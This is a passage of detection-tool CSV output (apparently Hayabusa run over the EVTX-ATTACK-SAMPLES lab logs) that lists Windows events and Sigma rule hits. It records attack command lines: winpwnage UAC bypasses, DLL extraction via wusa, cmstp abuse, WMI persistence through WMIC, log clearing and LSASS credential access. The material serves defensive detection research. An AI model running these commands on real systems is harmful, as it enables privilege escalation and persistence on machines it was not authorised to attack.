C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.594 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:23.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /C ""echo Dim objShell:Dim oFso:Set oFso = CreateObject(""Scripting.FileSystemObject""):Set objShell = WScript.CreateObject(""WScript.Shell""):command = ""powershell.exe"":objShell.Run command, 0:command = ""C:\Windows\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest"""""""""":objShell.Run command, 0:Set objShell = Nothing > ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:23.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /C ""C:\Windows\wscript.exe ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 12:25:24.896 +09:00,IEWIN7,1,informational,Process Creation,"Command: 
""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-09 12:25:25.067 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /name Microsoft.BackupAndRestoreCenter : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-09 12:25:25.067 +09:00,IEWIN7,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-10 21:21:57.077 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 7 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 21:22:08.465 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\users\ieuser\appdata\local\temp\system32\mmc.exe"" ""c:\users\ieuser\appdata\local\temp\system32\perfmon.msc"" : Path: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\perfmon.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 22:32:48.200 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 9 -p c:\Windows\System32\cmd.exe : Path: 
C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:32:58.549 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\CompMgmtLauncher.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami /priv : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""c:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,high,Run Whoami Showing Privileges,,rules/sigma/process_creation/win_whoami_priv.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:49:29.586 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:39.930 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:40.164 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:45.133 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cliconfg.exe"" : Path: C:\Windows\System32\cliconfg.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:45.378 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cliconfg.exe"" : Path: C:\Windows\System32\cliconfg.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-11 18:50:08.248 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:13.494 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:18.404 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:18.654 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx 
+2019-05-11 18:50:26.779 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe"" : Path: C:\Windows\ehome\Mcx2Prov.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:27.018 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe"" : Path: C:\Windows\ehome\Mcx2Prov.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-12 01:46:10.125 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:15.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:20.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet : Path: 
C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:20.828 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:54:02.071 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:07.508 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:12.493 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent 
Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:12.821 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 02:10:06.342 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,informational,Logon Type 9 - NewCredentials,User: IEUser : Workstation: : IP Address: ::1 : Port: 0 : LogonID: 0x1bbdce : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:28:17.176 +09:00,IEWIN7,1,informational,Process Creation,"Command: 
python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:19.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmstp.exe"" /au c:\users\ieuser\appdata\local\temp\tmp.ini : Path: C:\Windows\System32\cmstp.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:19.567 +09:00,IEWIN7,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:22.598 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:22.598 +09:00,IEWIN7,13,high,CMSTP Execution Registry Event,,rules/sigma/registry_event/sysmon_cmstp_execution_by_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:22.598 +09:00,IEWIN7,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:57:49.903 +09:00,IEWIN7,1,informational,Process 
Creation,"Command: python winpwnage.py -u elevate -5 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:22.809 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.215 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer CREATE Name=""BotConsumer23"", ExecutablePath=""c:\Windows\System32\cmd.exe"", CommandLineTemplate=""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.340 +09:00,IEWIN7,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.418 +09:00,IEWIN7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.450 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH 
__FilterToConsumerBinding CREATE Filter='__EventFilter.Name=""BotFilter82""', Consumer='CommandLineEventConsumer.Name=""BotConsumer23""' : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.590 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter CREATE Name=""BotFilter82"", EventNameSpace=""root\cimv2"", QueryLanguage=""WQL"", Query=""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:39.746 +09:00,IEWIN7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:50.090 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 
+2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.887 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer WHERE Name=""BotConsumer23"" DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.903 +09:00,IEWIN7,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.981 +09:00,IEWIN7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:55.028 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter WHERE Name=""BotFilter82"" DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 
02:58:55.090 +09:00,IEWIN7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:55.153 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=""BotFilter82""' DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 03:10:42.434 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 1 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 03:10:42.668 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 03:10:42.668 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 09:32:24.461 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 4 -p 
